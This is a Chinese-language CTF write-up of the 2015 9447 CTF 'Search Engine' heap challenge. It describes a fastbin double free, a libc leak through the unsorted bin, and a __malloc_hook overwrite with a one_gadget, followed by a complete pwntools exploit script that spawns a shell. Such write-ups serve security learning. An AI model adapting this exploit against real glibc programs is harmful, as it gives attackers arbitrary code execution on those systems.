fastbin double free

1.实例1 2015 9447 CTF : Search Engine
题目逻辑比较复杂,需要耐心仔细的分析.
还是那几样: 全局变量. 这里全局变量是一个链表头指针
数据结构及其存储分布分析:单链表结构,每个结构有2个指针指向字符串堆.
程序中释放内存后将内存置0,通过堆内容判断是否已经释放其实当内存释放后可能插入到unsorted bin,small
bin, fastbin中,前2种都会导致fd指针被修改不为0,从而导致uaf或者double free,这里利用了double free.
fastbin中第一个还没问题,但是第二个开始的fd指向下一个chunk还是会导致fd指针被修改不为0,导致double free.
利用总结:
fastbin 循环链表(f->b->a->b的漏洞,可将b申请(f->a->b),a申请(f->b->fd),再修改b的fd指向
(f->b->&main_arena_addr - 0x33,再申请(f->main_arena_addr - 0x33),再申请得到目标内存.
修改malloc_hook的内容为one_gadget,再次申请内存getshell
泄漏unsorted地址即可得到main_arena地址,即可得到libcbase

 gef➤  x/x &__malloc_hook
0x7fce71fbbb10 <__malloc_hook>: 0x0000000000000000
gef➤  x/x &main_arena
0x7fce71fbbb20 :    0x0000000000000000
__malloc_hook和main_arena相差0x10字节

exp:

from pwn import *
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
if args['DEBUG']:
    context.log_level = 'debug'
context.binary = "./search"
search = context.binary
if args['REMOTE']:
    p = remote('127.0.0.1', 7777)
else:
    p = process("./search")
    main_arena_offset = 0x3c4b20#main_arena与libc基址偏移是固定的,为这个,再gdb查看的命令:x/x &main_arena
log.info('PID: ' + str(proc.pidof(p)[0]))


def offset_bin_main_arena(idx):
    word_bytes = context.word_size / 8
    offset = 4  # lock
    offset += 4  # flags
    offset += word_bytes * 10  # offset fastbin
    offset += word_bytes * 2  # top,last_remainder
    offset += idx * 2 * word_bytes  # idx
    offset -= word_bytes * 2  # bin overlap
    return offset

#unsortedbin 离main_arena偏移又是固定的,因此泄漏unsortedbin地址即可泄漏libc基址
unsortedbin_offset_main_arena = offset_bin_main_arena(0)


def index_sentence(s):
    p.recvuntil("3: Quit\n")
    p.sendline('2')
    p.recvuntil("Enter the sentence size:\n")
    p.sendline(str(len(s)))
    p.send(s)


def search_word(word):
    p.recvuntil("3: Quit\n")
    p.sendline('1')
    p.recvuntil("Enter the word size:\n")
    p.sendline(str(len(word)))
    p.send(word)


def leak_libc():
    smallbin_sentence = 's' * 0x85 + ' m '
    index_sentence(smallbin_sentence)
    search_word('m')
    p.recvuntil('Delete this sentence (y/n)?\n')
    p.sendline('y')
    search_word('\x00')
    p.recvuntil('Found ' + str(len(smallbin_sentence)) + ': ')
    unsortedbin_addr = u64(p.recv(8))
    p.recvuntil('Delete this sentence (y/n)?\n')
    p.sendline('n')
    return unsortedbin_addr


def exp():
    # 1. leak libc base
    unsortedbin_addr = leak_libc()
    main_arena_addr = unsortedbin_addr - unsortedbin_offset_main_arena
    libc_base = main_arena_addr - main_arena_offset
    log.success('unsortedbin addr: ' + hex(unsortedbin_addr))
    log.success('libc base addr: ' + hex(libc_base))
    gdb.attach(p)
    # 2. create cycle fastbin 0x70 size
    index_sentence('a' * 0x5d + ' d ')  #a
    index_sentence('b' * 0x5d + ' d ')  #b
    index_sentence('c' * 0x5d + ' d ')  #c

    # a->b->c->NULL
    search_word('d')
    p.recvuntil('Delete this sentence (y/n)?\n')
    p.sendline('y')
    p.recvuntil('Delete this sentence (y/n)?\n')
    p.sendline('y')
    p.recvuntil('Delete this sentence (y/n)?\n')
    p.sendline('y')

    # b->a->b->a-> ...
    search_word('\x00')
    p.recvuntil('Delete this sentence (y/n)?\n')
    p.sendline('y')
    p.recvuntil('Delete this sentence (y/n)?\n')
    p.sendline('n')
    p.recvuntil('Delete this sentence (y/n)?\n')
    p.sendline('n')

    # 3. fastbin attack to malloc_hook nearby chunk
    fake_chunk_addr = main_arena_addr - 0x33
    fake_chunk = p64(fake_chunk_addr).ljust(0x60, 'f')

    index_sentence(fake_chunk)

    index_sentence('a' * 0x60)

    index_sentence('b' * 0x60)

    one_gadget_addr = libc_base + 0xf02a4
    payload = 'a' * 0x13 + p64(one_gadget_addr)
    payload = payload.ljust(0x60, 'f')

    index_sentence(payload)#再次申请会申请到main_arena_addr - 0x33处的内存,给用户的指针指向-0x23处
    #__malloc_hook 又离main_arena_addr偏移为0x10(&__malloc_hook+0x10==&main_arena)
    #在gdb中查看__malloc_hook命令:x/x &__malloc_hook
    #gdb查看调试进程pid:info proc
    p.interactive()


if __name__ == "__main__":
    exp()